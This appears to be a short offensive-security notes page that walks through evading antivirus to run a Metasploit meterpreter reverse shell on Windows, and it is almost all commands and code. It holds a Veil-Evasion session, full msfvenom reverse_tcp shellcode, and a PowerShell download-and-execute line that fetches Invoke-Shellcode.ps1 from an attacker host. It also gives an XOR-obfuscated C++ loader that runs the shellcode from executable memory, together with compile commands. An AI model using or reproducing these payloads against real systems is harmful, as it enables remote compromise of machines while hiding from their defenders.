# Evading the AV to execute meterpreter



Veil

# veil-evasion

[menu>>]: list
[*] Available Payloads:

...
5) c/meterpreter/rev_tcp
...

[menu>>]: 5

Payload: c/meterpreter/rev_tcp loaded

[c/meterpreter/rev_tcp>>]: set lhost 192.168.0.1
[i] LHOST => 192.168.0.1
LPORT 4444
COMPILE_TO_EXE Y

[c/meterpreter/rev_tcp>>]: generate
[>] Please enter the base name for output files: meterpreter-veil

[*] Executable written to: /var/lib/veil-evasion/output/compiled/meterpreter-veil.exe

Language: c
Payload: c/meterpreter/rev_tcp
Required Options: COMPILE_TO_EXE=Y LHOST=192.168.0.1 LPORT=4444
Payload File: /var/lib/veil-evasion/output/source/meterpreter-veil.c
Handler File: /var/lib/veil-evasion/output/handlers/meterpreter-veil_handler.rc

[menu>>]: exit

# msfconsole --resource /var/lib/veil-evasion/output/handlers/meterpreter-veil_handler.rc


Powersploit

# msfvenom --arch x86_64 --platform windows --payload windows/x64/meterpreter/reverse_tcp lhost=192.168.0.1 lport=4444 --format c 2>&1 | sed -e '1,3d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2-
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x00,0x00,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,0xe5,0x49,0xbc,0x02,0x00,0x11,0x5c,0xc0,0xa8,0x00,0x01,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,0x89,0xea,0x68,0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x05,0x41,0x5e,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0x49,0xff,0xce,0x75,0xe5,0xe8,0x93,0x00,0x00,0x00,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x04,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41,0x59,0x68,0x00,0x10,0x00,0x00,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x00,0x40,0x00,0x00,0x41,0x58,0x6a,0x00,0x5a,0x41,0xba,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x49,0xff,0xce,0xe9,0x3c,0xff,0xff,0xff,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,0x41,0xff,0xe7,0x58,0x6a,0x00,0x59,0x49,0xc7,0xc2,0xf0,0xb5,0xa2,0x56,0xff,0xd5

# msfconsole --resource meterpreter-powersploit_handler.rc

ps> iex (new-object net.webclient).downloadstring('http://192.168.0.1:8000/CodeExecution/Invoke-Shellcode.ps1')

ps> invoke-shellcode -shellcode 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x00,0x00,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,0xe5,0x49,0xbc,0x02,0x00,0x11,0x5c,0xc0,0xa8,0x00,0x01,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,0x89,0xea,0x68,0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x05,0x41,0x5e,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0x49,0xff,0xce,0x75,0xe5,0xe8,0x93,0x00,0x00,0x00,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x04,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41,0x59,0x68,0x00,0x10,0x00,0x00,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x00,0x40,0x00,0x00,0x41,0x58,0x6a,0x00,0x5a,0x41,0xba,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x49,0xff,0xce,0xe9,0x3c,0xff,0xff,0xff,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,0x41,0xff,0xe7,0x58,0x6a,0x00,0x59,0x49,0xc7,0xc2,0xf0,0xb5,0xa2,0x56,0xff,0xd5 -force


XOR routine and virtual allocation

# ipython

In [1]: meterpreter = [0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x00,0x00,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,0xe5,0x49,0xbc,0x02,0x00,0x11,0x5c,0xc0,0xa8,0x00,0x01,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,0x89,0xea,0x68,0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x05,0x41,0x5e,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0x49,0xff,0xce,0x75,0xe5,0xe8,0x93,0x00,0x00,0x00,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x04,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41,0x59,0x68,0x00,0x10,0x00,0x00,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x00,0x40,0x00,0x00,0x41,0x58,0x6a,0x00,0x5a,0x41,0xba,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x49,0xff,0xce,0xe9,0x3c,0xff,0xff,0xff,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,0x41,0xff,0xe7,0x58,0x6a,0x00,0x59,0x49,0xc7,0xc2,0xf0,0xb5,0xa2,0x56,0xff,0xd5]

In [2]: xored = ''

In [3]: for byte in meterpreter:
    xored += '\\' + hex(byte ^ ord('x'))[1:]
   ...:

In [4]: print xored
\x84\x30\xfb\x9c\x88\x90\xb4\x78\x78\x78\x39\x29\x39\x28\x2a\x29\x2e\x30\x49\xaa\x1d\x30\xf3\x2a\x18\x30\xf3\x2a\x60\x30\xf3\x2a\x58\x30\xf3\xa\x28\x30\x77\xcf\x32\x32\x35\x49\xb1\x30\x49\xb8\xd4\x44\x19\x4\x7a\x54\x58\x39\xb9\xb1\x75\x39\x79\xb9\x9a\x95\x2a\x39\x29\x30\xf3\x2a\x58\xf3\x3a\x44\x30\x79\xa8\x1e\xf9\x0\x60\x73\x7a\x77\xfd\xa\x78\x78\x78\xf3\xf8\xf0\x78\x78\x78\x30\xfd\xb8\xc\x1f\x30\x79\xa8\x28\xf3\x30\x60\x3c\xf3\x38\x58\x31\x79\xa8\x9b\x2e\x30\x87\xb1\x39\xf3\x4c\xf0\x30\x79\xae\x35\x49\xb1\x30\x49\xb8\xd4\x39\xb9\xb1\x75\x39\x79\xb9\x40\x98\xd\x89\x34\x7b\x34\x5c\x70\x3d\x41\xa9\xd\xa0\x20\x3c\xf3\x38\x5c\x31\x79\xa8\x1e\x39\xf3\x74\x30\x3c\xf3\x38\x64\x31\x79\xa8\x39\xf3\x7c\xf0\x30\x79\xa8\x39\x20\x39\x20\x26\x21\x22\x39\x20\x39\x21\x39\x22\x30\xfb\x94\x58\x39\x2a\x87\x98\x20\x39\x21\x22\x30\xf3\x6a\x91\x33\x87\x87\x87\x25\x31\xc6\xf\xb\x4a\x27\x4b\x4a\x78\x78\x39\x2e\x31\xf1\x9e\x30\xf9\x94\xd8\x79\x78\x78\x31\xf1\x9d\x31\xc4\x7a\x78\x69\x24\xb8\xd0\x78\x79\x39\x2c\x31\xf1\x9c\x34\xf1\x89\x39\xc2\x34\xf\x5e\x7f\x87\xad\x34\xf1\x92\x10\x79\x79\x78\x78\x21\x39\xc2\x51\xf8\x13\x78\x87\xad\x12\x7d\x39\x26\x28\x28\x35\x49\xb1\x35\x49\xb8\x30\x87\xb8\x30\xf1\xba\x30\x87\xb8\x30\xf1\xb9\x39\xc2\x92\x77\xa7\x98\x87\xad\x30\xf1\xbf\x12\x68\x39\x20\x34\xf1\x9a\x30\xf1\x81\x39\xc2\xe1\xdd\xc\x19\x87\xad\xfd\xb8\xc\x72\x31\x87\xb6\xd\x9d\x90\xeb\x78\x78\x78\x30\xfb\x94\x68\x30\xf1\x9a\x35\x49\xb1\x12\x7c\x39\x20\x30\xf1\x81\x39\xc2\x7a\xa1\xb0\x27\x87\xad\xfb\x80\x78\x6\x2d\x30\xfb\xbc\x58\x26\xf1\x8e\x12\x38\x39\x21\x10\x78\x68\x78\x78\x39\x20\x30\xf1\x8a\x30\x49\xb1\x39\xc2\x20\xdc\x2b\x9d\x87\xad\x30\xf1\xbb\x31\xf1\xbf\x35\x49\xb1\x31\xf1\x88\x30\xf1\xa2\x30\xf1\x81\x39\xc2\x7a\xa1\xb0\x27\x87\xad\xfb\x80\x78\x5\x50\x20\x39\x2f\x21\x10\x78\x38\x78\x78\x39\x20\x12\x78\x22\x39\xc2\x73\x57\x77\x48\x87\xad\x2f\x21\x39\xc2\xd\x16\x35\x19\x87\xad\x31\x87\xb6\x91\x44\x87\x87\x87\x30\x79\xbb\x30\x51\xbe\x30\xfd\x8e\xd\xcc\x39\x87\x9f\x20\x12\x78\x21\x31\xbf\xba\x88\xcd\xda\x2e\x87\xad

# cat meterpreter.cpp
#include <windows.h>
#include <iostream>

int main(int argc, char **argv) {
        char b[] = "\x84\x30\xfb\x9c\x88\x90\xb4\x78\x78\x78\x39\x29\x39\x28\x2a\x29\x2e\x30\x49\xaa\x1d\x30\xf3\x2a\x18\x30\xf3\x2a\x60\x30\xf3\x2a\x58\x30\xf3\xa\x28\x30\x77\xcf\x32\x32\x35\x49\xb1\x30\x49\xb8\xd4\x44\x19\x4\x7a\x54\x58\x39\xb9\xb1\x75\x39\x79\xb9\x9a\x95\x2a\x39\x29\x30\xf3\x2a\x58\xf3\x3a\x44\x30\x79\xa8\x1e\xf9\x0\x60\x73\x7a\x77\xfd\xa\x78\x78\x78\xf3\xf8\xf0\x78\x78\x78\x30\xfd\xb8\xc\x1f\x30\x79\xa8\x28\xf3\x30\x60\x3c\xf3\x38\x58\x31\x79\xa8\x9b\x2e\x30\x87\xb1\x39\xf3\x4c\xf0\x30\x79\xae\x35\x49\xb1\x30\x49\xb8\xd4\x39\xb9\xb1\x75\x39\x79\xb9\x40\x98\xd\x89\x34\x7b\x34\x5c\x70\x3d\x41\xa9\xd\xa0\x20\x3c\xf3\x38\x5c\x31\x79\xa8\x1e\x39\xf3\x74\x30\x3c\xf3\x38\x64\x31\x79\xa8\x39\xf3\x7c\xf0\x30\x79\xa8\x39\x20\x39\x20\x26\x21\x22\x39\x20\x39\x21\x39\x22\x30\xfb\x94\x58\x39\x2a\x87\x98\x20\x39\x21\x22\x30\xf3\x6a\x91\x33\x87\x87\x87\x25\x31\xc6\xf\xb\x4a\x27\x4b\x4a\x78\x78\x39\x2e\x31\xf1\x9e\x30\xf9\x94\xd8\x79\x78\x78\x31\xf1\x9d\x31\xc4\x7a\x78\x69\x24\xb8\xd0\x78\x79\x39\x2c\x31\xf1\x9c\x34\xf1\x89\x39\xc2\x34\xf\x5e\x7f\x87\xad\x34\xf1\x92\x10\x79\x79\x78\x78\x21\x39\xc2\x51\xf8\x13\x78\x87\xad\x12\x7d\x39\x26\x28\x28\x35\x49\xb1\x35\x49\xb8\x30\x87\xb8\x30\xf1\xba\x30\x87\xb8\x30\xf1\xb9\x39\xc2\x92\x77\xa7\x98\x87\xad\x30\xf1\xbf\x12\x68\x39\x20\x34\xf1\x9a\x30\xf1\x81\x39\xc2\xe1\xdd\xc\x19\x87\xad\xfd\xb8\xc\x72\x31\x87\xb6\xd\x9d\x90\xeb\x78\x78\x78\x30\xfb\x94\x68\x30\xf1\x9a\x35\x49\xb1\x12\x7c\x39\x20\x30\xf1\x81\x39\xc2\x7a\xa1\xb0\x27\x87\xad\xfb\x80\x78\x6\x2d\x30\xfb\xbc\x58\x26\xf1\x8e\x12\x38\x39\x21\x10\x78\x68\x78\x78\x39\x20\x30\xf1\x8a\x30\x49\xb1\x39\xc2\x20\xdc\x2b\x9d\x87\xad\x30\xf1\xbb\x31\xf1\xbf\x35\x49\xb1\x31\xf1\x88\x30\xf1\xa2\x30\xf1\x81\x39\xc2\x7a\xa1\xb0\x27\x87\xad\xfb\x80\x78\x5\x50\x20\x39\x2f\x21\x10\x78\x38\x78\x78\x39\x20\x12\x78\x22\x39\xc2\x73\x57\x77\x48\x87\xad\x2f\x21\x39\xc2\xd\x16\x35\x19\x87\xad\x31\x87\xb6\x91\x44\x87\x87\x87\x30\x79\xbb\x30\x51\xbe\x30\xfd\x8e\xd\xcc\x39\x87\x9f\x20\x12\x78\x21\x31\xbf\xba\x88\xcd\xda\x2e\x87\xad";
        char c[sizeof b];
        for (int i = 0; i < sizeof b; i++) {c[i] = b[i] ^ 'x';}
        void *exec = VirtualAlloc(0, sizeof c, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        memcpy(exec, c, sizeof c);
        ((void(*)())exec)();
}
# # 32bits - i686-w64-mingw32-g++ -static-libstdc++ -static-libgcc -o meterpreter.exe meterpreter.cpp
# x86_64-w64-mingw32-g++ -static-libstdc++ -static-libgcc -o meterpreter.exe meterpreter.cpp

No comments: